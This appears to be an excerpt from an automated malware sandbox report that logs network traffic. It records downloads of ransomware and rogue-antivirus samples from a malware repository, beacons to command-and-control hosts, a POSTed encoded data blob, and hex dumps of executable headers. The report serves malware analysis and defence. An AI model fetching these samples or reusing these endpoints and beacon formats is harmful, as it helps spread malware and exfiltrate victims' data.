          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SE2011.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SecurityScanner.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SmartDefragmenter.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SmartDefragmenter.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/VAV2008.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /scripts/new_install.php?owner=6AdwCleaner HTTP/1.1Host: www.vikingwebscanner.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
          Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/UNLOCKKEYS/LOGON.exe HTTP/1.1Host: arizonacode.bplaced.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /sw/log.php?v=31&aff_id=1&wm_id=46&u=5e4ec3dc-28c4-4007-bc6e-6b2c6debcd29&os=6.2.9200.256.1.9. HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 78.159.97.210Content-Length: 2441Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /sw/log.php?v=31&aff_id=1&wm_id=46&u=5e4ec3dc-28c4-4007-bc6e-6b2c6debcd29&os=10.0.17134.256.1.9. HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 78.159.97.210Content-Length: 661Cache-Control: no-cacheData Raw: 64 61 74 61 3d 41 4e 37 33 41 77 41 73 49 41 41 41 41 41 41 42 41 41 50 65 39 77 4d 41 4c 43 41 41 41 41 67 41 42 41 41 4b 41 41 41 41 41 41 41 41 41 41 48 65 39 77 4d 41 4c 43 41 41 41 41 51 41 42 51 41 73 46 51 41 41 41 74 37 33 41 77 41 73 49 41 41 41 44 41 41 47 41 44 6b 75 4d 54 45 75 4d 54 63 78 4d 7a 51 75 4d 41 50 65 39 77 4d 41 4c 43 41 41 41 41 67 41 43 41 41 4a 42 41 41 41 43 51 51 41 41 41 44 65 39 77 4d 41 4c 43 41 41 41 41 41 41 76 77 45 42 33 76 63 44 41 43 77 67 41 41 41 45 41 44 45 42 48 77 41 41 41 41 44 65 39 77 4d 41 4c 43 41 41 41 41 41 41 5a 41 41 41 33 76 63 44 41 43 77 67 41 41 41 41 41 47 55 41 41 4e 37 33 41 77 41 73 49 41 41 41 41 41 42 6d 41 41 44 65 39 77 4d 41 4c 43 41 41 41 41 41 41 61 41 41 43 33 76 63 44 41 43 77 67 41 41 41 34 41 48 41 41 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 55 52 68 64 47 46 63 4e 57 55 30 5a 57 4d 7a 5a 47 4d 74 4d 6a 68 6a 4e 43 30 30 4d 44 41 33 4c 57 4a 6a 4e 6d 55 74 4e 6d 49 79 59 7a 5a 6b 5a 57 4a 6a 5a 44 49 35 58 79 35 74 61 33 59 43 33 76 63 44 41 43 77 67 41 41 41 70 41 47 6b 41 4e 57 55 30 5a 57 4d 7a 5a 47 4d 74 4d 6a 68 6a 4e 43 30 30 4d 44 41 33 4c 57 4a 6a 4e 6d 55 74 4e 6d 49 79 59 7a 5a 6b 5a 57 4a 6a 5a 44 49 35 58 79 35 74 61 33 59 41 33 76 63 44 41 43 77 67 41 41 41 41 41 47 77 41 41 4e 37 33 41 77 41 73 49 41 41 41 41 41 43 43 41 41 44 65 39 77 4d 41 4c 43 41 41 41 41 41 41 4b 77 45 41 33 76 63 44 41 43 77 67 41 41 41 41 41 43 34 42 41 4e 37 33 41 77 41 73 49 41 41 41 41 41 43 5a 41 41 44 75 39 77 4d 41 4c 43 41 41 41 41 41 41 6e 67 41 41 37 76 63 44 41 43 77 67 41 41 41 41 41 4a 6f 41 41 75 37 33 41 77 41 73 49 41 41 41 4a 41 41 43 41 44 56 6c 4e 47 56 6a 4d 32 52 6a 4c 54 49 34 59 7a 51 74 4e 44 41 77 4e 79 31 69 59 7a 5a 6c 4c 54 5a 69 4d 6d 4d 32 5a 47 56 69 59 32 51 79 4f 51 4c 75 39 77 4d 41 4c 43 41 41 41 43 51 41 41 77 41 78 59 7a 6c 6b 5a 54 51 35 59 69 31 6b 59 6a 5a 69 4c 54 51 33 4f 54 45 74 4f 54 6b 78 4f 43 30 34 4e 32 55 77 5a 6d 5a 6c 4f 54 51 32 5a 6a 41 21 Data Ascii: data=AN73AwAsIAAAAAABAAPe9wMALCAAAAgABAAKAAAAAAAAAAHe9wMALCAAAAQABQAsFQAAAt73AwAsIAAADAAGADkuMTEuMTcxMzQuMAPe9wMALCAAAAgACAAJBAAACQQAAADe9wMALCAAAAAAvwEB3vcDACwgAAAEADEBHwAAAADe9wMALCAAAAAAZAAA3vcDACwgAAAAAGUAAN73AwAsIAAAAABmAADe9wMALCAAAAAAaAAC3vcDACwgAAA4AHAAQzpcUHJvZ3JhbURhdGFcNWU0ZWMzZGMtMjhjNC00MDA3LWJjNmUtNmIyYzZkZWJjZDI5Xy5ta3YC3vcDACwgAAApAGkANWU0ZWMzZGMtMjhjNC00MDA3LWJjNmUtNmIyYzZkZWJjZDI5Xy5ta3YA3vcDACwgAAAAAGwAAN73AwAsIAAAAACCAADe9wMALCAAAAAAKwEA3vcDACwgAAAAAC4BAN73AwAsIAAAAACZAADu9wMALCAAAAAAngAA7vcDACwgAAAAAJoAAu73AwAsIAAAJAACADVlNGVjM2RjLTI4YzQtNDAwNy1iYzZlLTZiMmM2ZGViY2QyOQLu9wMALCAAACQAAwAxYzlkZTQ5Yi1kYjZiLTQ3OTEtOTkxOC04N2UwZmZlOTQ2ZjA!
          Source: global trafficHTTP traffic detected: GET /scripts/status.php?action=renew&id=0 HTTP/1.1Host: www.vikingwebscanner.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /sw/log.php?v=31&aff_id=1&wm_id=46&u=5e4ec3dc-28c4-4007-bc6e-6b2c6debcd29&os=10.0.17134.256.1.9. HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 78.159.97.210Content-Length: 813Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/UNLOCKKEYS/LOGON.exe HTTP/1.1Host: arizonacode.bplaced.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /scripts/status.php?action=renew&id=0 HTTP/1.1Host: www.vikingwebscanner.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /themes/prestashop/cache/stats.php HTTP/1.1Host: powertoolsforyou.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /themes/prestashop/cache/stats.php HTTP/1.1Host: powertoolsforyou.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/UNLOCKKEYS/LOGON.exe HTTP/1.1Host: arizonacode.bplaced.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:03 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:03 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:03 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:05 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 13:00:05 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 